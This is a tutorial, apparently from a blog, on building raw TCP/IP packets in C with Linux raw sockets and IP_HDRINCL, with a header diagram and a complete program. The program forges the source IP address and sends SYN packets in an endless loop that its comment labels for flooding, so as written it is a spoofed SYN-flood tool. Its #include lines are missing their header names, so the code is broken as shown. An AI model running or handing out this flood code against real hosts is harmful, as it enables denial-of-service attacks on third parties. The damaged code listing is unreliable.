+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          Source Port          |       Destination Port        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                        Sequence Number                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Acknowledgment Number                      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Data |           |U|A|P|R|S|F|                               |
| Offset| Reserved  |R|C|S|S|Y|I|            Window             |
|       |           |G|K|H|T|N|N|                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Checksum            |         Urgent Pointer        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Options                    |    Padding    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                             data                              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
So we need to construct the headers according to the formats specified above.

Raw tcp sockets

Create a raw socket like this
1
int s = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
The above function call creates a raw socket of protocol TCP. This means that we have to provide the TCP header along with the data. The kernel or the network stack of Linux shall provide the IP header.
If we want to provide the IP header as well then there are 2 ways of doing this
1. Use protocol IPPROTO_RAW - This will allow to specify the IP header and everything that is contained in the packet.
1
int s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW);
2. Set the IP_HDRINCL socket option to 1 - This is same as the above. Just another way of doing.
1
2
3
4
5
6
7
8
9
int s = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
 
int one = 1;
const int *val = &one;
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
{
    printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno , strerror(errno));
    exit(0);
}
When using the IP_HDRINCL the protocol used in the socket function is effectively of no use.
In this example we are creating raw sockets where we specify the Ip header and TCP header. The packet that moves out of the machine actually has 1 more header attached to it called the Ethernet header. So the actual packet structure is somewhat like this.
Packet = Ethernet header + Ip header + TCP header + Data
Take a look at the packets sniffed by wireshark to understand this better. It is important to note here that the Ethernet header is provided by the OS kernel and we do not have to construct it. However it is possible to make such raw packets where we can even specify the ethernet header, but we shall look into those in a separate article.
Below is an example code which constructs a raw TCP packet with some data

Final Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
/*
    Raw TCP packets
    Silver Moon (m00n.silv3r@gmail.com)
*/
#include //for printf
#include //memset
#include    //for socket ofcourse
#include //for exit(0);
#include //For errno - the error number
#include   //Provides declarations for tcp header
#include    //Provides declarations for ip header
 
/*
    96 bit (12 bytes) pseudo header needed for tcp header checksum calculation
*/
struct pseudo_header
{
    u_int32_t source_address;
    u_int32_t dest_address;
    u_int8_t placeholder;
    u_int8_t protocol;
    u_int16_t tcp_length;
};
 
/*
    Generic checksum calculation function
*/
unsigned short csum(unsigned short *ptr,int nbytes)
{
    register long sum;
    unsigned short oddbyte;
    register short answer;
 
    sum=0;
    while(nbytes>1) {
        sum+=*ptr++;
        nbytes-=2;
    }
    if(nbytes==1) {
        oddbyte=0;
        *((u_char*)&oddbyte)=*(u_char*)ptr;
        sum+=oddbyte;
    }
 
    sum = (sum>>16)+(sum & 0xffff);
    sum = sum + (sum>>16);
    answer=(short)~sum;
     
    return(answer);
}
 
int main (void)
{
    //Create a raw socket
    int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
     
    if(s == -1)
    {
        //socket creation failed, may be because of non-root privileges
        perror("Failed to create socket");
        exit(1);
    }
     
    //Datagram to represent the packet
    char datagram[4096] , source_ip[32] , *data , *pseudogram;
     
    //zero out the packet buffer
    memset (datagram, 0, 4096);
     
    //IP header
    struct iphdr *iph = (struct iphdr *) datagram;
     
    //TCP header
    struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
    struct sockaddr_in sin;
    struct pseudo_header psh;
     
    //Data part
    data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);
    strcpy(data , "ABCDEFGHIJKLMNOPQRSTUVWXYZ");
     
    //some address resolution
    strcpy(source_ip , "192.168.1.2");
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80);
    sin.sin_addr.s_addr = inet_addr ("1.2.3.4");
     
    //Fill in the IP Header
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);
    iph->id = htonl (54321); //Id of this packet
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;      //Set to 0 before calculating checksum
    iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address
    iph->daddr = sin.sin_addr.s_addr;
     
    //Ip checksum
    iph->check = csum ((unsigned short *) datagram, iph->tot_len);
     
    //TCP Header
    tcph->source = htons (1234);
    tcph->dest = htons (80);
    tcph->seq = 0;
    tcph->ack_seq = 0;
    tcph->doff = 5;  //tcp header size
    tcph->fin=0;
    tcph->syn=1;
    tcph->rst=0;
    tcph->psh=0;
    tcph->ack=0;
    tcph->urg=0;
    tcph->window = htons (5840); /* maximum allowed window size */
    tcph->check = 0; //leave checksum 0 now, filled later by pseudo header
    tcph->urg_ptr = 0;
     
    //Now the TCP checksum
    psh.source_address = inet_addr( source_ip );
    psh.dest_address = sin.sin_addr.s_addr;
    psh.placeholder = 0;
    psh.protocol = IPPROTO_TCP;
    psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );
     
    int psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);
    pseudogram = malloc(psize);
     
    memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
    memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));
     
    tcph->check = csum( (unsigned short*) pseudogram , psize);
     
    //IP_HDRINCL to tell the kernel that headers are included in the packet
    int one = 1;
    const int *val = &one;
     
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
    {
        perror("Error setting IP_HDRINCL");
        exit(0);
    }
     
    //loop if you want to flood :)
    while (1)
    {
        //Send the packet
        if (sendto (s, datagram, iph->tot_len ,  0, (struct sockaddr *) &sin, sizeof (sin)) < 0)
        {
            perror("sendto failed");
        }
        //Data send successfully
        else
        {
            printf ("Packet Send. Length : %d \n" , iph->tot_len);
        }
    }
     
    return 0;
}
 
//Complete

Compile and Run

Compile by program by doing a gcc raw_socket.c at the terminal. Remember to run the program with root privileges. Raw sockets require root privileges. Note the while loop in the above program. It has been put for testing purpose and should be removed if you dont intend to flood the target.
Use a packet sniffer like wireshark to check the output and verify that the packets have actually been generated and send over the network. Also note that if some kind of firewall like firestarter is running then it might block raw packets.

Resources

http://linux.die.net/man/7/raw